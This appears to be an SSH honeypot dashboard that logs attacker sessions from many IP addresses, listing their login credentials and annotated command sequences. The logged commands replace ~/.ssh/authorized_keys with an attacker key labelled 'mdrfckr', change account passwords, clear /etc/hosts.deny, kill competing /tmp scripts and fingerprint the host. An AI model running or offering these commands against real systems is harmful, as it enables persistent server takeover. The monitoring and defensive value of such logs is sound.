2026-05-22 20:20 EDT Β· as ubuntu/Ubuntu1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Ubuntu1234\nDMatLKs6He51\nDMatLKs6He51"|passwd|bash
$ Enter new UNIX password:
$ echo "Ubuntu1234\nDMatLKs6He51\nDMatLKs6He51\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_10 (209.14.88.118) β€” SΓ£o Paulo, Brazil Β· 2 sessions Β· 39 cmds
2026-05-22 19:56 EDT Β· as root/Aa135246, sysadmin/1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:2eLD203RPEmh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1\nLibdtgNtX3r0\nLibdtgNtX3r0"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nLibdtgNtX3r0\nLibdtgNtX3r0\n"|passwd
🎭 phantom_root_74 (43.128.120.247) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-22 19:16 EDT Β· as ryan/ryan1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ryan1234\nEW3cOz4M6SxX\nEW3cOz4M6SxX"|passwd|bash
$ Enter new UNIX password:
$ echo "ryan1234\nEW3cOz4M6SxX\nEW3cOz4M6SxX\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_4 (64.226.107.125) β€” Frankfurt am Main, Germany Β· 1 session Β· 20 cmds
2026-05-22 19:14 EDT Β· as deploy/1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\ndKpOGReShrxy\ndKpOGReShrxy"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\ndKpOGReShrxy\ndKpOGReShrxy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_9 (103.56.115.187) β€” San Po Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-22 19:10 EDT Β· as dspace/dspace@2025
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dspace@2025\naFuyT1BIIHNm\naFuyT1BIIHNm"|passwd|bash
$ Enter new UNIX password:
$ echo "dspace@2025\naFuyT1BIIHNm\naFuyT1BIIHNm\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_67 (201.249.166.171) β€” San Carlos del Zulia, Venezuela Β· 2 sessions Β· 4 cmds
2026-05-22 18:25 EDT Β· as mythtv/mythtv, ubuntu/Huawei12#$
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 viking_root_6 (9.223.176.221) β€” GΓ€vle, Sweden Β· 1 session Β· 2 cmds
2026-05-22 18:46 EDT Β· as root/121314
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 capoeira_root_11 (177.87.110.141) β€” Foz do IguaΓ§u, Brazil Β· 3 sessions Β· 6 cmds
2026-05-22 18:28 EDT Β· as mythtv/mythtv, root/YS123456, ubuntu/Huawei12#$
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 cipher_root_66 (95.159.59.35) β€” Damascus, Syria Β· 2 sessions Β· 4 cmds
2026-05-22 18:19 EDT Β· as root/YS123456, ubuntu/Huawei12#$
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 barbie_root_2 (223.27.18.80) β€” Narre Warren, Australia Β· 1 session Β· 2 cmds
2026-05-22 17:57 EDT Β· as developer/a1b2c3d4
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 cowboy_root_38 (152.32.150.26) β€” Reston, United States Β· 3 sessions Β· 23 cmds
2026-05-21 20:54 EDT Β· as igor/igor, njzf/njzf, root/Server1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:9ALZLUAFFQTq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_73 (196.189.116.182) β€” Addis Ababa, Ethiopia Β· 1 session Β· 2 cmds
2026-05-22 17:40 EDT Β· as root/root123456@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 burger_root_41 (143.110.207.86) β€” Santa Clara, United States Β· 1 session Β· 2 cmds
2026-05-22 17:39 EDT Β· as builduser/builduser
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 tiger_root_12 (103.199.203.67) β€” Guwahati, India Β· 1 session Β· 20 cmds
2026-05-22 16:27 EDT Β· as igor/igor
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "igor\n5lGBA9THxAuk\n5lGBA9THxAuk"|passwd|bash
$ Enter new UNIX password:
$ echo "igor\n5lGBA9THxAuk\n5lGBA9THxAuk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_11 (188.247.83.225) β€” Amman, Jordan Β· 1 session Β· 20 cmds
2026-05-22 16:24 EDT Β· as njzf/njzf
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "njzf\nPGph8nEGRu72\nPGph8nEGRu72"|passwd|bash
$ Enter new UNIX password:
$ echo "njzf\nPGph8nEGRu72\nPGph8nEGRu72\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_86 (103.187.147.16) β€” Jakarta, Indonesia Β· 1 session Β· 1 cmd
2026-05-22 16:19 EDT Β· as admin/P@ssword2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_75 (147.50.227.79) β€” Huai Khwang, Thailand Β· 1 session Β· 19 cmds
2026-05-22 16:10 EDT Β· as root/A123456A
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:YA9vhOAXhRav"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_13 (181.116.220.140) β€” La Plata, Argentina Β· 3 sessions Β· 60 cmds
2026-05-10 02:46 EDT Β· as anas/anas, test/7654321, user/Password1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "anas\nLHoOgeoyAWSn\nLHoOgeoyAWSn"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "anas\nLHoOgeoyAWSn\nLHoOgeoyAWSn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "7654321\nuITeVWGUsGhD\nuITeVWGUsGhD"|passwd|bash
$ echo "7654321\nuITeVWGUsGhD\nuITeVWGUsGhD\n"|passwd
$ echo -e "Password1234\nok8snvYJinre\nok8snvYJinre"|passwd|bash
$ echo "Password1234\nok8snvYJinre\nok8snvYJinre\n"|passwd
🎭 ghost_root_87 (212.154.234.9) β€” Almaty, Kazakhstan Β· 1 session Β· 19 cmds
2026-05-22 15:04 EDT Β· as root/QAZwsx123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
